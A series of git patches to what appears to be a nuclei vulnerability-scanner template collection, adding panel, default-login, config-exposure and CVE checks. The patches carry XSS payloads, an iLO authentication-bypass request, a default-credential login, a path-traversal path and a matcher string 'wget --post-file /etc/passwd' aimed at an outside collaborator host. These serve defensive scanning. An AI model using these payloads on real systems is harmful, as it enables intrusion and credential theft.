hmc-hybris-panel + +info: + name: SAP Hybris Management Console + author: dogasantos + severity: info + +requests: + - method: GET + path: + - "{{BaseURL}}/hmc/hybris" + matchers: + - type: word + words: + - "hybris Management Console" + part: body + From eb02ca13ecf4754394382998f6ce298f01caabfe Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 4 Mar 2021 13:42:43 +0000 Subject: [PATCH 227/370] new path --- exposed-panels/hmc-hybris-panel.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml index eb60e52f28..01440c9894 100644 --- a/exposed-panels/hmc-hybris-panel.yaml +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -9,6 +9,7 @@ requests: - method: GET path: - "{{BaseURL}}/hmc/hybris" + - "{{BaseURL}}/hybris/hmc/hybris" matchers: - type: word words: From 6aac34fa0d1e30c6816a6d337ad1f2e9d29309cd Mon Sep 17 00:00:00 2001 From: Douglas Santos Date: Thu, 4 Mar 2021 13:47:55 +0000 Subject: [PATCH 228/370] trailing-spaces/empty-lines fix --- exposed-panels/hmc-hybris-panel.yaml | 3 --- 1 file changed, 3 deletions(-) diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml index 01440c9894..a5c7521742 100644 --- a/exposed-panels/hmc-hybris-panel.yaml +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -1,10 +1,8 @@ id: hmc-hybris-panel - info: name: SAP Hybris Management Console author: dogasantos severity: info - requests: - method: GET path: @@ -15,4 +13,3 @@ requests: words: - "hybris Management Console" part: body - From e6adb1d7430b1ff4b06bc546d465cbf868f356e3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:20:07 +0530 Subject: [PATCH 229/370] improving matcher --- cves/2017/CVE-2017-12542.yaml | 37 ----------------------------------- technologies/ilo-detect.yaml | 14 ++++++++++++- 2 files changed, 13 insertions(+), 38 deletions(-) delete mode 100644 cves/2017/CVE-2017-12542.yaml diff --git a/cves/2017/CVE-2017-12542.yaml b/cves/2017/CVE-2017-12542.yaml deleted file mode 100644 index 63cf3ce77a..0000000000 --- a/cves/2017/CVE-2017-12542.yaml +++ /dev/null @@ -1,37 +0,0 @@ -id: CVE-2017-12542 -info: - name: Authentication Bypass in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 - author: apt-mirror - severity: high - description: A authentication bypass and execution of code vulnerability in HPE Integrated Lights-out 4 (iLO 4) version prior to 2.53 was found. - reference: https://www.synacktiv.com/en/publications/rce-vulnerability-in-hp-ilo.html - tags: cve,cve2017,hp,ilo,traversal - - # References: - # - [1] https://www.cvedetails.com/cve/CVE-2017-12542/ - # - [2] https://nvd.nist.gov/vuln/detail/CVE-2017-12542 - # - [3] https://github.com/skelsec/CVE-2017-12542 -requests: - - raw: - - | - GET /rest/v1/AccountService/Accounts HTTP/1.1 - Host: {{Hostname}} - User-Agent: Mozilla/5.0 - Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 - Accept-Language: en-US,en;q=0.5 - Connection: AAAAAAAAAAAAAAAAAAAAAAAAAAAAA - Upgrade-Insecure-Requests: 1 - matchers: - - type: word - words: - - "Items" - part: body - - - method: GET - path: - - "{{BaseURL}}/xmldata?item=all" - extractors: - - type: regex - part: body - regex: - - "(.*)" diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 6743892663..4266260496 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -16,8 +16,20 @@ requests: status: - 200 + - type: word + words: + - text/xml + part: header + + - type: word + words: + - + - + condition: and + extractors: - type: regex part: body + group: 1 regex: - - "(.*)" + - "([0-9.]+)" From 8141c9f23e6a8b0ef0dcd4a0dd2bd534cdb0c5fe Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:22:05 +0530 Subject: [PATCH 230/370] Update ilo-detect.yaml --- technologies/ilo-detect.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/technologies/ilo-detect.yaml b/technologies/ilo-detect.yaml index 4266260496..70f0fc1e8d 100644 --- a/technologies/ilo-detect.yaml +++ b/technologies/ilo-detect.yaml @@ -11,6 +11,7 @@ requests: path: - "{{BaseURL}}/xmldata?item=all" + matchers-condition: and matchers: - type: status status: From 4378593afa69667d1167fb99ca34922dff60eaf4 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 13:52:51 +0000 Subject: [PATCH 231/370] Auto Update README [Thu Mar 4 13:52:51 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 7714c90ada..067fcd0a95 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | -| exposures | 59 | technologies | 48 | misconfiguration | 50 | +| exposures | 59 | technologies | 49 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 16 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 666 files**. +**68 directories, 667 files**. From 412b56a12caa12eb3f66fe86712b2aba2023d009 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:24:36 +0530 Subject: [PATCH 232/370] misc updates --- exposed-panels/hmc-hybris-panel.yaml | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/exposed-panels/hmc-hybris-panel.yaml b/exposed-panels/hmc-hybris-panel.yaml index a5c7521742..2fb8ab3570 100644 --- a/exposed-panels/hmc-hybris-panel.yaml +++ b/exposed-panels/hmc-hybris-panel.yaml @@ -1,13 +1,16 @@ id: hmc-hybris-panel + info: - name: SAP Hybris Management Console + name: SAP Hybris Management Console author: dogasantos severity: info + requests: - method: GET path: - "{{BaseURL}}/hmc/hybris" - "{{BaseURL}}/hybris/hmc/hybris" + matchers: - type: word words: From a28619afa2836ad4efb20f4f9a24b24c800cf1ae Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 21:05:38 +0700 Subject: [PATCH 233/370] Create alibaba-canal-default-password.yaml --- .../alibaba-canal-default-password.yaml | 25 +++++++++++++++++++ 1 file changed, 25 insertions(+) create mode 100644 default-logins/alibaba/alibaba-canal-default-password.yaml diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml new file mode 100644 index 0000000000..824a4a27a9 --- /dev/null +++ b/default-logins/alibaba/alibaba-canal-default-password.yaml @@ -0,0 +1,25 @@ +id: alibaba-canal-default-password + +info: + name: Alibaba Canal Default Password + author: pdteam + severity: high + tags: alibaba,dlogin + +requests: + - method: POST + path: + - "{{BaseURL}}/api/v1/user/login" + headers: + Content-Type: application/json + body: | + {"username":"admin","password":"123456"} + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "token" From 118dca8441d4136907a44b55379db7204661a91e Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 19:42:08 +0530 Subject: [PATCH 234/370] Update alibaba-canal-default-password.yaml --- default-logins/alibaba/alibaba-canal-default-password.yaml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/default-logins/alibaba/alibaba-canal-default-password.yaml b/default-logins/alibaba/alibaba-canal-default-password.yaml index 824a4a27a9..e396fa3e8d 100644 --- a/default-logins/alibaba/alibaba-canal-default-password.yaml +++ b/default-logins/alibaba/alibaba-canal-default-password.yaml @@ -22,4 +22,6 @@ requests: - 200 - type: word words: - - "token" + - 'data":{"token"' + - '"code":20000' + condition: and From 049ec6d82aa87df1617524c040309295b2c6f3f0 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 14:13:06 +0000 Subject: [PATCH 235/370] Auto Update README [Thu Mar 4 14:13:06 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 067fcd0a95..fac6ca8f84 100644 --- a/README.md +++ b/README.md @@ -39,11 +39,11 @@ An overview of the nuclei template directory including number of templates assoc | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | | exposures | 59 | technologies | 49 | misconfiguration | 50 | -| workflows | 23 | miscellaneous | 16 | default-logins | 16 | +| workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**68 directories, 667 files**. +**69 directories, 668 files**. From 79dc490572c5419563b85e9477e31c10f067b34b Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 14:27:55 +0000 Subject: [PATCH 236/370] Auto Update README [Thu Mar 4 14:27:55 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fac6ca8f84..fb8fc6b02d 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 220 | vulnerabilities | 105 | exposed-panels | 94 | +| cves | 220 | vulnerabilities | 105 | exposed-panels | 95 | | exposures | 59 | technologies | 49 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 668 files**. +**69 directories, 669 files**. From da0391fd37b6fab5ad9ab5e6ce9d9b1ee13a42ea Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:02:49 +0530 Subject: [PATCH 237/370] Improving matchers --- cves/2019/CVE-2019-17506.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2019/CVE-2019-17506.yaml b/cves/2019/CVE-2019-17506.yaml index 78135fb9a2..1a4818fbe1 100644 --- a/cves/2019/CVE-2019-17506.yaml +++ b/cves/2019/CVE-2019-17506.yaml @@ -27,3 +27,4 @@ requests: - "" - "DEVICE.ACCOUNT" part: body + condition: and \ No newline at end of file From 7c32ecd13e3293680c89b10735368250710d3c6b Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:25:34 +0530 Subject: [PATCH 238/370] improved matcher --- cves/2021/CVE-2021-21315.yaml | 3 +++ 1 file changed, 3 insertions(+) diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index d638b12209..e590a46279 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -23,6 +23,9 @@ requests: - type: word words: - "wget --post-file /etc/passwd burpcollaborator.net" + - name + - running + - pids part: body condition: and From 27a94bc03afcc9c821810f1ecc60d0e72ccf4dd9 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 14:58:21 +0000 Subject: [PATCH 239/370] Auto Update README [Thu Mar 4 14:58:21 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index fb8fc6b02d..d74c75c7e9 100644 --- a/README.md +++ b/README.md @@ -37,13 +37,13 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | -| cves | 220 | vulnerabilities | 105 | exposed-panels | 95 | +| cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | | exposures | 59 | technologies | 49 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 669 files**. +**69 directories, 670 files**. From 1a652283db2c5bc6e4b65f4cf19c90d6e347a544 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:28:32 +0530 Subject: [PATCH 240/370] Update CVE-2021-21315.yaml --- cves/2021/CVE-2021-21315.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2021/CVE-2021-21315.yaml b/cves/2021/CVE-2021-21315.yaml index e590a46279..024445ca4a 100644 --- a/cves/2021/CVE-2021-21315.yaml +++ b/cves/2021/CVE-2021-21315.yaml @@ -5,7 +5,7 @@ info: author: pikpikcu severity: high reference: https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC - tags: node.js,cve,cve2021 + tags: nodejs,cve,cve2021 requests: - method: GET From b00b0bd98bb5a92a121dabe350f5847be1c60d19 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:31:21 +0530 Subject: [PATCH 241/370] misc updates --- technologies/microsoft-echange-server-detect.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/technologies/microsoft-echange-server-detect.yaml b/technologies/microsoft-echange-server-detect.yaml index 05a88b55a3..d06d3b6aa9 100644 --- a/technologies/microsoft-echange-server-detect.yaml +++ b/technologies/microsoft-echange-server-detect.yaml @@ -21,9 +21,9 @@ requests: - type: regex regex: - - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" + - "(X-Owa-Version:|/owa/auth/15.2.*|/owa/auth/15.1.*|/owa/auth/15.0.*|/owa/auth/14.0.*)" part: all - + extractors: - type: kval part: header From 8461498f9a54ae2ee207fabbbb579bc17d0f7071 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 15:08:50 +0000 Subject: [PATCH 242/370] Auto Update README [Thu Mar 4 15:08:50 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index d74c75c7e9..33cccc42c2 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | -| exposures | 59 | technologies | 49 | misconfiguration | 50 | +| exposures | 59 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 670 files**. +**69 directories, 671 files**. From b7aba7f7acf30b8559bbc9311d2dd0af4006d644 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 20:53:55 +0530 Subject: [PATCH 243/370] improved matcher --- cves/2019/CVE-2019-5127.yaml | 17 ++++++++++++----- 1 file changed, 12 insertions(+), 5 deletions(-) diff --git a/cves/2019/CVE-2019-5127.yaml b/cves/2019/CVE-2019-5127.yaml index be37d16bbc..eaa1499e56 100644 --- a/cves/2019/CVE-2019-5127.yaml +++ b/cves/2019/CVE-2019-5127.yaml @@ -23,12 +23,19 @@ requests: matchers-condition: and matchers: - - type: regex - regex: - - "uid(.*)" - - "gid(.*)" - part: body + - type: word + words: + - "uid=" + - "gid=" + - "groups=" condition: and + part: body + + - type: word + words: + - text/plain + part: header + - type: status status: - 200 From e71bba4cf47f2a28e833c5324d36fdeb19ba56a9 Mon Sep 17 00:00:00 2001 From: oppsec <50470310+oppsec@users.noreply.github.com> Date: Thu, 4 Mar 2021 13:00:06 -0300 Subject: [PATCH 244/370] Create joomla-config-file.yaml --- exposures/files/joomla-config-file.yaml | 30 +++++++++++++++++++++++++ 1 file changed, 30 insertions(+) create mode 100644 exposures/files/joomla-config-file.yaml diff --git a/exposures/files/joomla-config-file.yaml b/exposures/files/joomla-config-file.yaml new file mode 100644 index 0000000000..6ae2bbc14a --- /dev/null +++ b/exposures/files/joomla-config-file.yaml @@ -0,0 +1,30 @@ +id: joomla-config-dist-file + +info: + name: Joomla Config Dist File + author: oppsec + severity: low + description: configuration.php-dist is a file created by Joomla to save Joomla settings. + +requests: + - method: GET + path: + - "{{BaseURL}}/configuration.php-dist" + + matchers-condition: and + matchers: + - type: word + words: + - "Joomla" + - "JConfig" + - "@package" + condition: and + + - type: word + words: + - "text/plain" + part: header + + - type: status + status: + - 200 From 04cc9c44fb074ead714e11a4d56b8995fda35291 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 21:32:34 +0530 Subject: [PATCH 245/370] xss matchers update --- cves/2019/CVE-2019-7219.yaml | 4 ++-- cves/2020/CVE-2020-1943.yaml | 4 ++-- vulnerabilities/other/discourse-xss.yaml | 4 ++-- 3 files changed, 6 insertions(+), 6 deletions(-) diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml index a8cd8101f0..388fa44735 100644 --- a/cves/2019/CVE-2019-7219.yaml +++ b/cves/2019/CVE-2019-7219.yaml @@ -9,14 +9,14 @@ info: requests: - method: GET path: - - "{{BaseURL}}/webapp/?fccc0\">5f43d=1" + - '{{BaseURL}}/webapp/?fccc%27\%22%3E%3Csvg/onload=alert(xss)%3E' matchers-condition: and matchers: - type: word part: body words: - - "\">" + - "" - type: word part: header words: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index e23b19c19f..33eb610341 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -9,13 +9,13 @@ info: requests: - method: GET path: - - '{{BaseURL}}/control/stream?contentId=' + - '{{BaseURL}}/control/stream?contentId=%27\%22%3E%3Csvg/onload=alert(xss)%3E' matchers-condition: and matchers: - type: word words: - - "" + - "" part: body - type: word diff --git a/vulnerabilities/other/discourse-xss.yaml b/vulnerabilities/other/discourse-xss.yaml index 08b3f7c10f..1ba1c7ef63 100644 --- a/vulnerabilities/other/discourse-xss.yaml +++ b/vulnerabilities/other/discourse-xss.yaml @@ -10,7 +10,7 @@ info: requests: - method: GET path: - - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(1337)%3E' + - '{{BaseURL}}/email/unsubscribed?email=test@gmail.com%27\%22%3E%3Csvg/onload=alert(xss)%3E' matchers-condition: and matchers: - type: status @@ -19,7 +19,7 @@ requests: - type: word words: - - "" + - "" part: body - type: word From 3a2d49657441a4d2d84efb4b3d29655f47756b3f Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 22:20:57 +0530 Subject: [PATCH 246/370] improved matcher --- cves/2020/CVE-2020-13937.yaml | 6 ++++-- 1 file changed, 4 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index dc69730ad9..bb7e362009 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -29,13 +29,15 @@ requests: - type: status status: - 200 + - type: word words: - "application/json" - condition: and part: header + - type: word words: - - "config" + - config + - kylin.metadata.url condition: and part: body From e082b8ee1f3d5311df9e60b9e3ad7ed9bdbad252 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Thu, 4 Mar 2021 23:56:06 +0700 Subject: [PATCH 247/370] =?UTF-8?q?Typo=20reference=20=F0=9F=A4=A6?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-13937.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index bb7e362009..4cd9ad78e4 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -11,7 +11,7 @@ info: 3.0.2, 3.1.0, 4.0.0-alpha has one restful api which exposed Kylin's configuration information without any authentication, so it is dangerous because some confidential information entries will be disclosed to everyone. - reference: ttps://nvd.nist.gov/vuln/detail/CVE-2020-13937 + reference: https://nvd.nist.gov/vuln/detail/CVE-2020-13937 tags: cve,cve2020,apache # References: From 06f67cdbfca701a4b8275c9325b9486264522f60 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 22:29:42 +0530 Subject: [PATCH 248/370] moving files around --- exposures/{files => configs}/joomla-config-file.yaml | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename exposures/{files => configs}/joomla-config-file.yaml (100%) diff --git a/exposures/files/joomla-config-file.yaml b/exposures/configs/joomla-config-file.yaml similarity index 100% rename from exposures/files/joomla-config-file.yaml rename to exposures/configs/joomla-config-file.yaml From 1a4bd524ce10440498ba7a5ce656ed5650f259e5 Mon Sep 17 00:00:00 2001 From: PikPikcU <60111811+pikpikcu@users.noreply.github.com> Date: Fri, 5 Mar 2021 00:10:33 +0700 Subject: [PATCH 249/370] =?UTF-8?q?Delete=20matchers=20config=20?= =?UTF-8?q?=F0=9F=94=A8?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- cves/2020/CVE-2020-13937.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index 4cd9ad78e4..1dde372bb1 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -37,7 +37,6 @@ requests: - type: word words: - - config - kylin.metadata.url condition: and part: body From 93c170e3c40ff2f27a7c4e80ca33ce2b1e9c1a07 Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Thu, 4 Mar 2021 17:20:11 +0000 Subject: [PATCH 250/370] Auto Update README [Thu Mar 4 17:20:11 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/README.md b/README.md index 33cccc42c2..82d6b5e71c 100644 --- a/README.md +++ b/README.md @@ -38,12 +38,12 @@ An overview of the nuclei template directory including number of templates assoc | Templates | Counts | Templates | Counts | Templates | Counts | | -------------- | ------------------------------ | --------------- | ------------------------------- | ---------------- | ------------------------------ | | cves | 221 | vulnerabilities | 105 | exposed-panels | 95 | -| exposures | 59 | technologies | 50 | misconfiguration | 50 | +| exposures | 60 | technologies | 50 | misconfiguration | 50 | | workflows | 23 | miscellaneous | 16 | default-logins | 17 | | exposed-tokens | 9 | dns | 6 | fuzzing | 4 | | helpers | 2 | takeovers | 1 | - | - | -**69 directories, 671 files**. +**69 directories, 672 files**. From 65037ba558a60779d5f7ade88b15c6ebf725c3c3 Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Thu, 4 Mar 2021 22:50:32 +0530 Subject: [PATCH 251/370] Update CVE-2020-13937.yaml --- cves/2020/CVE-2020-13937.yaml | 1 + 1 file changed, 1 insertion(+) diff --git a/cves/2020/CVE-2020-13937.yaml b/cves/2020/CVE-2020-13937.yaml index 1dde372bb1..4cd9ad78e4 100644 --- a/cves/2020/CVE-2020-13937.yaml +++ b/cves/2020/CVE-2020-13937.yaml @@ -37,6 +37,7 @@ requests: - type: word words: + - config - kylin.metadata.url condition: and part: body From 99f30958383ef876abe2572a3ae18befdf38ae18 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 01:59:41 +0530 Subject: [PATCH 252/370] Create advance-setup.yaml --- exposed-panels/advance-setup.yaml | 22 ++++++++++++++++++++++ 1 file changed, 22 insertions(+) create mode 100644 exposed-panels/advance-setup.yaml diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml new file mode 100644 index 0000000000..b8a4fa5b54 --- /dev/null +++ b/exposed-panels/advance-setup.yaml @@ -0,0 +1,22 @@ +id: advance-setup-login + +info: + name: Advance Setup Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6819 + +requests: + - method: GET + path: + - '{{BaseURL}}' + - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Advanced Setup - Security - Admin User Name & Password' + - type: status + status: + - 200 From 3024a5142c4627599149e3ec414601c20bce7c16 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:00:05 +0530 Subject: [PATCH 253/370] Create blue-iris-login.yaml --- exposed-panels/blue-iris-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/blue-iris-login.yaml diff --git a/exposed-panels/blue-iris-login.yaml b/exposed-panels/blue-iris-login.yaml new file mode 100644 index 0000000000..de085c8d45 --- /dev/null +++ b/exposed-panels/blue-iris-login.yaml @@ -0,0 +1,21 @@ +id: blue-iris-login + +info: + name: Blue Iris Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6814 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.htm' + + matchers-condition: and + matchers: + - type: word + words: + - 'Blue Iris Login' + - type: status + status: + - 200 From 9e8bc5d17775c7133e9fcc61002b125b16cb37f8 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:00:31 +0530 Subject: [PATCH 254/370] Create keenetic-web-login.yaml --- exposed-panels/keenetic-web-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/keenetic-web-login.yaml diff --git a/exposed-panels/keenetic-web-login.yaml b/exposed-panels/keenetic-web-login.yaml new file mode 100644 index 0000000000..7f68b943f3 --- /dev/null +++ b/exposed-panels/keenetic-web-login.yaml @@ -0,0 +1,21 @@ +id: keenetic-web-login + +info: + name: Keenetic Web Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6817 + +requests: + - method: GET + path: + - '{{BaseURL}}/login#goto=%2Fdashboard' + + matchers-condition: and + matchers: + - type: word + words: + - 'Keenetic Web' + - type: status + status: + - 200 From fb8ede7df433f64aa16e0f8c96f53e8c3da2af30 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:01:27 +0530 Subject: [PATCH 255/370] Create remote-ui-login.yaml --- exposed-panels/remote-ui-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/remote-ui-login.yaml diff --git a/exposed-panels/remote-ui-login.yaml b/exposed-panels/remote-ui-login.yaml new file mode 100644 index 0000000000..2987e33b23 --- /dev/null +++ b/exposed-panels/remote-ui-login.yaml @@ -0,0 +1,21 @@ +id: remote-ui-login + +info: + name: Remote UI Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/6815 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'System Manager ID:' + - type: status + status: + - 200 From ec00f004a34b8fd2bfc0ea5a866e803db9e24ba2 Mon Sep 17 00:00:00 2001 From: Dhiyaneshwaran Date: Fri, 5 Mar 2021 02:09:35 +0530 Subject: [PATCH 256/370] Create cisco-integrated-login.yaml --- exposed-panels/cisco-integrated-login.yaml | 21 +++++++++++++++++++++ 1 file changed, 21 insertions(+) create mode 100644 exposed-panels/cisco-integrated-login.yaml diff --git a/exposed-panels/cisco-integrated-login.yaml b/exposed-panels/cisco-integrated-login.yaml new file mode 100644 index 0000000000..b075e29973 --- /dev/null +++ b/exposed-panels/cisco-integrated-login.yaml @@ -0,0 +1,21 @@ +id: cisco-integrated-login + +info: + name: Cisco Integrated Management Controller Login + author: dhiyaneshDK + severity: info + reference: https://www.exploit-db.com/ghdb/3859 + +requests: + - method: GET + path: + - '{{BaseURL}}/login.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Cisco Integrated Management Controller Login' + - type: status + status: + - 200 From 7a57776609828dc6fd46101c66a91f99bf7eb2ca Mon Sep 17 00:00:00 2001 From: sandeep <8293321+ehsandeep@users.noreply.github.com> Date: Fri, 5 Mar 2021 11:00:14 +0530 Subject: [PATCH 257/370] Update advance-setup.yaml --- exposed-panels/advance-setup.yaml | 1 - 1 file changed, 1 deletion(-) diff --git a/exposed-panels/advance-setup.yaml b/exposed-panels/advance-setup.yaml index b8a4fa5b54..f2a2600f5d 100644 --- a/exposed-panels/advance-setup.yaml +++ b/exposed-panels/advance-setup.yaml @@ -9,7 +9,6 @@ info: requests: - method: GET path: - - '{{BaseURL}}' - '{{BaseURL}}/cgi-bin/webcm?getpage=../html/login.html' matchers-condition: and From d968939968218b30c3f5928499583453f1b78c0e Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Fri, 5 Mar 2021 05:30:55 +0000 Subject: [PATCH 258/370] Auto Update README [Fri Mar 5 05:30:55 UTC 2021] :robot: --- README.md | 4 ++-- 1 file changed, 2 